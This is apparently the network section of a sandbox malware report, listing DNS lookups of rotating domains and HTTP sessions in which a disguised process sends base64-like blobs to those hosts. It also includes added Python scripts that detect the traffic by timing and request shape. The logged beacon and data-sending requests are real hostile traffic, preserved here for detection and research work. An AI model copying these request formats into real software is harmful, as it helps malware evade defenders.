Jan 10, 2025 09:12:24.845916986 CET | 53 | 61513 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:12:39.172780991 CET | 62845 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:12:39.650697947 CET | 53 | 62845 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:12:53.233191013 CET | 54470 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:12:53.255156994 CET | 53 | 54470 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:13:09.796221018 CET | 59218 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:13:09.820092916 CET | 53 | 59218 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:13:23.170207024 CET | 63817 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:13:24.022773981 CET | 53 | 63817 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:13:37.988543034 CET | 65167 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:13:38.068217993 CET | 53 | 65167 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:13:51.652394056 CET | 65370 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:13:51.740695953 CET | 53 | 65370 | 1.1.1.1 | 192.168.2.6
Jan 10, 2025 09:13:59.887447119 CET | 62867 | 53 | 192.168.2.6 | 1.1.1.1
Jan 10, 2025 09:13:59.907392025 CET | 53 | 62867 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 09:10:55.796648026 CET | 192.168.2.6 | 1.1.1.1 | 0x6030 | Standard query (0) | www.kx22368.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:11:12.060868025 CET | 192.168.2.6 | 1.1.1.1 | 0xb70f | Standard query (0) | www.laduta.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:11:25.348342896 CET | 192.168.2.6 | 1.1.1.1 | 0x6984 | Standard query (0) | www.einpisalpace.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:11:39.325790882 CET | 192.168.2.6 | 1.1.1.1 | 0xeb53 | Standard query (0) | www.ripbgs.info | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:11:53.637645960 CET | 192.168.2.6 | 1.1.1.1 | 0xe082 | Standard query (0) | www.0303588a47.buzz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:01.701426029 CET | 192.168.2.6 | 1.1.1.1 | 0x61e9 | Standard query (0) | www.tizzles.tech | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:10.298854113 CET | 192.168.2.6 | 1.1.1.1 | 0xc498 | Standard query (0) | www.explorevision.xyz | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:24.501889944 CET | 192.168.2.6 | 1.1.1.1 | 0x4fd3 | Standard query (0) | www.babyzhibo.net | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:39.172780991 CET | 192.168.2.6 | 1.1.1.1 | 0x4eb2 | Standard query (0) | www.mzkd6gp5.top | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:53.233191013 CET | 192.168.2.6 | 1.1.1.1 | 0x949b | Standard query (0) | www.potorooqr.lol | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:13:09.796221018 CET | 192.168.2.6 | 1.1.1.1 | 0xfd9e | Standard query (0) | www.infovea.tech | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:13:23.170207024 CET | 192.168.2.6 | 1.1.1.1 | 0x1f76 | Standard query (0) | www.itcomp.store | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:13:37.988543034 CET | 192.168.2.6 | 1.1.1.1 | 0x66e7 | Standard query (0) | www.100millionjobs.africa | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:13:51.652394056 CET | 192.168.2.6 | 1.1.1.1 | 0xc518 | Standard query (0) | www.glyttera.shop | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:13:59.887447119 CET | 192.168.2.6 | 1.1.1.1 | 0xf10a | Standard query (0) | www.overlayoasis.quest | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 09:10:56.151990891 CET | 1.1.1.1 | 192.168.2.6 | 0x6030 | No error (0) | www.kx22368.shop | url.gname.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 09:10:56.151990891 CET | 1.1.1.1 | 192.168.2.6 | 0x6030 | No error (0) | url.gname.net | | 172.65.235.97 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:11:12.082726955 CET | 1.1.1.1 | 192.168.2.6 | 0xb70f | No error (0) | www.laduta.xyz | | 192.64.119.109 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:11:25.362319946 CET | 1.1.1.1 | 192.168.2.6 | 0x6984 | No error (0) | www.einpisalpace.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:11:25.362319946 CET | 1.1.1.1 | 192.168.2.6 | 0x6984 | No error (0) | www.einpisalpace.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:11:39.342988014 CET | 1.1.1.1 | 192.168.2.6 | 0xeb53 | No error (0) | www.ripbgs.info | | 47.83.1.90 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:11:53.647073030 CET | 1.1.1.1 | 192.168.2.6 | 0xe082 | Name error (3) | www.0303588a47.buzz | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:01.710093975 CET | 1.1.1.1 | 192.168.2.6 | 0x61e9 | Name error (3) | www.tizzles.tech | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:10.352669954 CET | 1.1.1.1 | 192.168.2.6 | 0xc498 | No error (0) | www.explorevision.xyz | | 162.0.236.169 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:24.845916986 CET | 1.1.1.1 | 192.168.2.6 | 0x4fd3 | No error (0) | www.babyzhibo.net | | 192.186.58.31 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:39.650697947 CET | 1.1.1.1 | 192.168.2.6 | 0x4eb2 | No error (0) | www.mzkd6gp5.top | | 104.21.64.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:39.650697947 CET | 1.1.1.1 | 192.168.2.6 | 0x4eb2 | No error (0) | www.mzkd6gp5.top | | 104.21.80.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:39.650697947 CET | 1.1.1.1 | 192.168.2.6 | 0x4eb2 | No error (0) | www.mzkd6gp5.top | | 104.21.112.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:39.650697947 CET | 1.1.1.1 | 192.168.2.6 | 0x4eb2 | No error (0) | www.mzkd6gp5.top | | 104.21.32.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:39.650697947 CET | 1.1.1.1 | 192.168.2.6 | 0x4eb2 | No error (0) | www.mzkd6gp5.top | | 104.21.96.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:39.650697947 CET | 1.1.1.1 | 192.168.2.6 | 0x4eb2 | No error (0) | www.mzkd6gp5.top | | 104.21.16.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:39.650697947 CET | 1.1.1.1 | 192.168.2.6 | 0x4eb2 | No error (0) | www.mzkd6gp5.top | | 104.21.48.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:12:53.255156994 CET | 1.1.1.1 | 192.168.2.6 | 0x949b | No error (0) | www.potorooqr.lol | | 127.0.0.1 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:13:09.820092916 CET | 1.1.1.1 | 192.168.2.6 | 0xfd9e | No error (0) | www.infovea.tech | infovea.tech | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 09:13:09.820092916 CET | 1.1.1.1 | 192.168.2.6 | 0xfd9e | No error (0) | infovea.tech | | 76.223.67.189 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:13:09.820092916 CET | 1.1.1.1 | 192.168.2.6 | 0xfd9e | No error (0) | infovea.tech | | 13.248.213.45 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:13:24.022773981 CET | 1.1.1.1 | 192.168.2.6 | 0x1f76 | No error (0) | www.itcomp.store | itcomp.store | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 09:13:24.022773981 CET | 1.1.1.1 | 192.168.2.6 | 0x1f76 | No error (0) | itcomp.store | | 103.247.11.204 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:13:38.068217993 CET | 1.1.1.1 | 192.168.2.6 | 0x66e7 | No error (0) | www.100millionjobs.africa | 100millionjobs.africa | | CNAME (Canonical name) | IN (0x0001) | false
Jan 10, 2025 09:13:38.068217993 CET | 1.1.1.1 | 192.168.2.6 | 0x66e7 | No error (0) | 100millionjobs.africa | | 136.243.64.147 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:13:51.740695953 CET | 1.1.1.1 | 192.168.2.6 | 0xc518 | Name error (3) | www.glyttera.shop | none | none | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:13:59.907392025 CET | 1.1.1.1 | 192.168.2.6 | 0xf10a | No error (0) | www.overlayoasis.quest | | 172.67.148.216 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 09:13:59.907392025 CET | 1.1.1.1 | 192.168.2.6 | 0xf10a | No error (0) | www.overlayoasis.quest | | 104.21.55.137 | A (IP address) | IN (0x0001) | false
                                                                    • www.kx22368.shop
                                                                    • www.laduta.xyz
                                                                    • www.einpisalpace.shop
                                                                    • www.ripbgs.info
                                                                    • www.explorevision.xyz
                                                                    • www.babyzhibo.net
                                                                    • www.mzkd6gp5.top
                                                                    • www.infovea.tech
                                                                    • www.itcomp.store
                                                                    • www.100millionjobs.africa
                                                                    • www.overlayoasis.quest
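The DNS tables above carry more signal than the individual domain names: one host resolves fifteen never-repeated names across eleven TLDs in about three minutes, three of them NXDOMAIN, one answered with 127.0.0.1, and the gap to the next lookup is roughly 8 s after an NXDOMAIN against roughly 14 s after a successful resolution (the resolved names are followed by a TCP 80 exchange before the sleep). The script below is an added example, not part of the Joe Sandbox report or of any vendor signature: it re-keys the fifteen query/response pairs from the tables into a timestamp|name|rcode|answers form and measures exactly those properties. The thresholds (min_domains, min_tlds), the flag names, and the two-label "registrable domain" approximation are this example's own assumptions; a real pipeline would use a public-suffix list.

```python
"""Cadence and answer heuristics over the DNS activity recorded above.

Added example, not part of the Joe Sandbox report. Thresholds and flag
names are the example's own choices, not a vendor signature.
"""
import ipaddress
import re
import statistics
from datetime import datetime

# Constructed from the DNS query/response tables above: query timestamp,
# queried name, reply code, A-record answers (CNAME hops dropped).
DNS_RECORDS = [
    "Jan 10, 2025 09:10:55.796648026 CET|www.kx22368.shop|NOERROR|172.65.235.97",
    "Jan 10, 2025 09:11:12.060868025 CET|www.laduta.xyz|NOERROR|192.64.119.109",
    "Jan 10, 2025 09:11:25.348342896 CET|www.einpisalpace.shop|NOERROR|188.114.96.3,188.114.97.3",
    "Jan 10, 2025 09:11:39.325790882 CET|www.ripbgs.info|NOERROR|47.83.1.90",
    "Jan 10, 2025 09:11:53.637645960 CET|www.0303588a47.buzz|NXDOMAIN|",
    "Jan 10, 2025 09:12:01.701426029 CET|www.tizzles.tech|NXDOMAIN|",
    "Jan 10, 2025 09:12:10.298854113 CET|www.explorevision.xyz|NOERROR|162.0.236.169",
    "Jan 10, 2025 09:12:24.501889944 CET|www.babyzhibo.net|NOERROR|192.186.58.31",
    "Jan 10, 2025 09:12:39.172780991 CET|www.mzkd6gp5.top|NOERROR|104.21.64.1,104.21.80.1,104.21.112.1,104.21.32.1,104.21.96.1,104.21.16.1,104.21.48.1",
    "Jan 10, 2025 09:12:53.233191013 CET|www.potorooqr.lol|NOERROR|127.0.0.1",
    "Jan 10, 2025 09:13:09.796221018 CET|www.infovea.tech|NOERROR|76.223.67.189,13.248.213.45",
    "Jan 10, 2025 09:13:23.170207024 CET|www.itcomp.store|NOERROR|103.247.11.204",
    "Jan 10, 2025 09:13:37.988543034 CET|www.100millionjobs.africa|NOERROR|136.243.64.147",
    "Jan 10, 2025 09:13:51.652394056 CET|www.glyttera.shop|NXDOMAIN|",
    "Jan 10, 2025 09:13:59.887447119 CET|www.overlayoasis.quest|NOERROR|172.67.148.216,104.21.55.137",
]

TS_RE = re.compile(r"^(\w{3} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2})\.(\d+) \w+$")
EPOCH = datetime(1970, 1, 1)


def parse_ts(text):
    """'Jan 10, 2025 09:10:55.796648026 CET' -> float seconds.

    The report prints nine fractional digits and strptime's %f stops at
    six, so the fraction is parsed separately. The zone label is dropped:
    only differences between timestamps are used below."""
    m = TS_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised timestamp: {text!r}")
    base = datetime.strptime(m.group(1), "%b %d, %Y %H:%M:%S")
    return (base - EPOCH).total_seconds() + float("0." + m.group(2))


def parse_records(lines):
    recs = []
    for line in lines:
        ts, name, rcode, answers = line.split("|")
        addrs = [ipaddress.ip_address(a) for a in answers.split(",") if a]
        recs.append({"ts": parse_ts(ts), "name": name.lower(), "rcode": rcode, "addrs": addrs})
    return sorted(recs, key=lambda r: r["ts"])


def registrable(name):
    """Assumed approximation: last two labels. Fine for the single-label
    TLDs seen here; use a public-suffix list for anything else."""
    return ".".join(name.rstrip(".").split(".")[-2:])


def analyze(records, min_domains=10, min_tlds=5):
    # Gap to the NEXT query, bucketed by THIS query's reply code: a resolved
    # name is followed by an HTTP attempt, an NXDOMAIN is skipped faster.
    gaps_after = {}
    for cur, nxt in zip(records, records[1:]):
        gaps_after.setdefault(cur["rcode"], []).append(nxt["ts"] - cur["ts"])
    all_gaps = [g for gs in gaps_after.values() for g in gs]
    domains = {registrable(r["name"]) for r in records}
    tlds = {d.rsplit(".", 1)[-1] for d in domains}
    names_unique = len({r["name"] for r in records}) == len(records)
    return {
        "distinct_domains": len(domains),
        "distinct_tlds": len(tlds),
        "nxdomain": [r["name"] for r in records if r["rcode"] == "NXDOMAIN"],
        # 127.0.0.1 as an A answer is a sinkhole or a parked decoy, never a C2.
        "loopback_answers": [r["name"] for r in records if any(a.is_loopback for a in r["addrs"])],
        "window_seconds": round(records[-1]["ts"] - records[0]["ts"], 1) if len(records) > 1 else 0.0,
        "median_gap": statistics.median(all_gaps) if all_gaps else None,
        "median_gap_after": {k: statistics.median(v) for k, v in gaps_after.items()},
        "rotation_suspected": names_unique and len(domains) >= min_domains and len(tlds) >= min_tlds,
    }


if __name__ == "__main__":
    for key, value in analyze(parse_records(DNS_RECORDS)).items():
        print(f"{key}: {value}")
```

The two-bucket gap measurement is the part worth keeping: a median of about 14 s after resolved names and about 8 s after NXDOMAIN names is a timing fingerprint that survives a complete change of the domain list, whereas the domains themselves are disposable.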
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49982 | 172.65.235.97 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:10:56.173058033 CET | 519 | OUT | GET /ca6n/?-0-L9xY=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU=&Mn=PdO8wZnxGnZX HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.kx22368.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Jan 10, 2025 09:10:56.984431028 CET | 302 | IN | HTTP/1.1 503 Service Temporarily Unavailable
                                                                    Date: Fri, 10 Jan 2025 08:10:56 GMT
                                                                    Content-Type: text/html
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: 56fd9e85ebadb2723800014374fae84a=b5887e17bb899062c5ea7d22ac13c1ac
                                                                    Data Raw: 33 37 0d 0a 4c 6f 61 64 69 6e 67 20 69 6e 20 70 72 6f 67 72 65 73 73 2e 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 37Loading in progress.<script>location.href="";</script>0
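Session 0 above and session 1 below show the same request shape against two different hosts: a path of one four-character alphanumeric directory, a single parameter named -0-L9xY carrying an unescaped base64-alphabet blob (as a query string on the GET, as a form body on the POST, where the hex dump starts 2d 30 2d 4c 39 78 59 3d), a short second parameter, Connection: close, and a 2011-vintage Ubuntu 11.04 / Chromium 12 User-Agent sent by a process running under C:\Program Files (x86). The script below is an added example, not part of the Joe Sandbox report: it parses the two requests as printed on this page (Accept headers omitted; the POST body is only the first 64 bytes of the report's truncated Data Raw dump) and scores them with heuristics derived from those observations. The flag names, the 40-character blob threshold, the four-character directory pattern and the host_os parameter are this example's assumptions, not a FormBook signature.

```python
"""Shape heuristics for the two C2 requests recorded in sessions 0 and 1.

Added example, not part of the Joe Sandbox report. Request text is copied
from the page; thresholds and flag names are the example's own.
"""
import re

# Constructed from session 0 as printed above (Accept headers omitted).
GET_REQUEST = (
    "GET /ca6n/?-0-L9xY=0h9Wf4Uk+EHtRoE9GYslXHc8OAVXToPYP42Hdey84aKhqV9wbfXJif0/"
    "+OnZ2BVp9cN120ZusPNi0A+xg/3t9NEZmf+IGJW1PRZ6E2m6SBA4aflrt404XQhuINrHqXgvx4ee6EU="
    "&Mn=PdO8wZnxGnZX HTTP/1.1\r\n"
    "Host: www.kx22368.shop\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) "
    "Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30\r\n"
    "\r\n"
)

# First 64 bytes of session 1's 'Data Raw' dump; the report truncates the rest.
POST_BODY_HEX = (
    "2d 30 2d 4c 39 78 59 3d 39 4d 68 4e 67 45 52 67 66 48 52 43 47 4c 70 76 "
    "43 61 69 36 56 70 41 76 33 50 58 63 61 63 45 7a 31 54 56 4d 2b 4c 41 49 "
    "31 49 66 2f 63 6c 46 70 65 49 71 77 62 5a 5a 2b"
)
POST_REQUEST = (
    "POST /d89m/ HTTP/1.1\r\n"
    "Host: www.laduta.xyz\r\n"
    "Origin: http://www.laduta.xyz\r\n"
    "Referer: http://www.laduta.xyz/d89m/\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: close\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) "
    "Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30\r\n"
    "\r\n" + bytes.fromhex(POST_BODY_HEX).decode("ascii")
)

SHORT_DIR_RE = re.compile(r"^/[a-z0-9]{4}/$")          # assumed pattern from /ca6n/ and /d89m/
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def split_params(qs):
    """Split a query string or form body WITHOUT percent/plus decoding.

    urllib.parse.parse_qsl would turn '+' into a space and break the
    alphabet test below; the sample sends '+' and '/' unescaped."""
    pairs = []
    for part in qs.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def parse_request(raw):
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": query, "headers": headers, "body": body}


def score_request(raw, host_os="windows", min_blob=40):
    """host_os is an assumed input from the sensor (the report is a Windows run)."""
    req = parse_request(raw)
    flags = []
    if SHORT_DIR_RE.match(req["path"]):
        flags.append("short_alnum_dir")
    params = split_params(req["query"])
    if req["method"] == "POST" and "x-www-form-urlencoded" in req["headers"].get("content-type", ""):
        params += split_params(req["body"])
    blob_keys = [k for k, v in params if len(v) >= min_blob and B64_RE.match(v)]
    if blob_keys:
        flags.append("base64_blob_param")
    if host_os == "windows" and "Linux" in req["headers"].get("user-agent", ""):
        flags.append("ua_os_mismatch")      # a Windows process claiming X11/Linux
    referer = req["headers"].get("referer", "")
    if referer and referer.endswith(req["path"]) and req["headers"].get("host", "") in referer:
        flags.append("self_referer")        # Referer points at the very URL being posted to
    return {"host": req["headers"].get("host"), "path": req["path"], "blob_keys": blob_keys, "flags": flags}


def shared_blob_keys(results):
    """Blob parameter names common to every request: a per-build constant
    that outlives the rotating hosts and is the better pivot."""
    sets = [set(r["blob_keys"]) for r in results]
    return set.intersection(*sets) if sets else set()


if __name__ == "__main__":
    scored = [score_request(GET_REQUEST), score_request(POST_REQUEST)]
    for s in scored:
        print(s)
    print("shared blob keys:", shared_blob_keys(scored))
```

Run the two recorded requests through it and both trip short_alnum_dir, base64_blob_param and ua_os_mismatch, the POST additionally self_referer, and the only blob key shared by both is -0-L9xY. The raw splitter matters: decoding the query with a standard form parser would turn the '+' characters in the blob into spaces and the alphabet check would miss.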


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49983 | 192.64.119.109 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:11:12.101990938 CET | 769 | OUT | POST /d89m/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.laduta.xyz
                                                                    Origin: http://www.laduta.xyz
                                                                    Referer: http://www.laduta.xyz/d89m/
                                                                    Cache-Control: no-cache
                                                                    Content-Length: 212
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Data Ascii: -0-L9xY=9MhNgERgfHRCGLpvCai6VpAv3PXcacEz1TVM+LAI1If/clFpeIqwbZZ+86K0vpIpPge1js9FBoly2oQF0juYLbjOryT6ws93CYQv7UvYPQ8VJWlcAIIotl6MYWL6NNnR6B7M+nVUp09UlpHMbXEsqdB1ZRN3bkR3gzn4wYaxXK84ufhZZ7PKpjOb9VIJukmfaD5lu1I2kno4
Jan 10, 2025 09:11:12.567893982 CET | 193 | IN | HTTP/1.1 302 Found
Date: Fri, 10 Jan 2025 08:11:12 GMT
Content-Length: 0
Connection: close
Location: https://laduta.xyz/d89m
X-Served-By: Namecheap URL Forward
Server: namecheap-nginx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49985 | 192.64.119.109 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:11:14.702112913 CET | 793 | OUT | POST /d89m/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.laduta.xyz
Origin: http://www.laduta.xyz
Referer: http://www.laduta.xyz/d89m/
Cache-Control: no-cache
Content-Length: 236
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Data Ascii: -0-L9xY=9MhNgERgfHRCHr5vOZ66cpAupfXcU8E31TZM+KEY293/dF1pdJqwcZZ+oqKsrpIYPgSTjtRFBrZy2pgF0SufLLjMjST4tc93CYQv7UqFPQ0VJihcSdkpyV6LOmL6JNnr6B6Z+m5up2FUlp3MbCwrhdA+dRMGfkZ5tju75pS3KosOiJ8DFIPp7zuZ9XQ7uEm1YDBl8iERrTNbY+Tq9ezX9PQ2WHLPC4ETBg==
Jan 10, 2025 09:11:15.182732105 CET | 193 | IN | HTTP/1.1 302 Found
Date: Fri, 10 Jan 2025 08:11:15 GMT
Content-Length: 0
Connection: close
Location: https://laduta.xyz/d89m
X-Served-By: Namecheap URL Forward
Server: namecheap-nginx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49986 | 192.64.119.109 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:11:17.252322912 CET | 1806 | OUT | POST /d89m/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.laduta.xyz
Origin: http://www.laduta.xyz
Referer: http://www.laduta.xyz/d89m/
Cache-Control: no-cache
Content-Length: 1248
Connection: close
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Data Ascii: -0-L9xY=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 [TRUNCATED]
Jan 10, 2025 09:11:17.714900017 CET | 193 | IN | HTTP/1.1 302 Found
Date: Fri, 10 Jan 2025 08:11:17 GMT
Content-Length: 0
Connection: close
Location: https://laduta.xyz/d89m
X-Served-By: Namecheap URL Forward
Server: namecheap-nginx


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.6 | 49987 | 192.64.119.109 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:11:19.991816998 CET | 517 | OUT | GET /d89m/?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd/1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F/TSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws=&Mn=PdO8wZnxGnZX HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.laduta.xyz
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Ubuntu/11.04 Chromium/12.0.742.112 Chrome/12.0.742.112 Safari/534.30
Jan 10, 2025 09:11:20.332204103 CET | 615 | IN | HTTP/1.1 302 Found
Date: Fri, 10 Jan 2025 08:11:20 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 213
Connection: close
Location: https://laduta.xyz/d89m?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F%2FTSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws%3D&Mn=PdO8wZnxGnZX
X-Served-By: Namecheap URL Forward
Server: namecheap-nginx
Data Ascii: <a href='https://laduta.xyz/d89m?-0-L9xY=wOJtjxBUJG0NHp56IJ7sd%2F1V3u72daYOpRR77J0hq9zwdUZOJreNUKl+oLjHq+QISX71stRTOJ1jv48F%2FTSYOOjikWrIxOApFu5A5DiOQ2wTGmACeJ5Y8X2xSxX+WaLEulDl8ws%3D&Mn=PdO8wZnxGnZX'>Found</a>.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.6 | 49988 | 188.114.96.3 | 80 | 6728 | C:\Program Files (x86)\wdyCDONUkjCHUlirAdnccLnEiJUpbtfaUypSWVCACaTTgOYBdYcgvlsaUJvwoMmhpiqwf\OtAlYRopPg.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 09:11:25.520510912 CET | 790 | OUT | POST /pgw3/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.einpisalpace.shop
Origin: http://www.einpisalpace.shop
Referer: http://www.einpisalpace.shop/pgw3/
Cache-Control: no-cache
Content-Length: 212
Connection: close
Content-Type: application/x-www-form-urlencoded
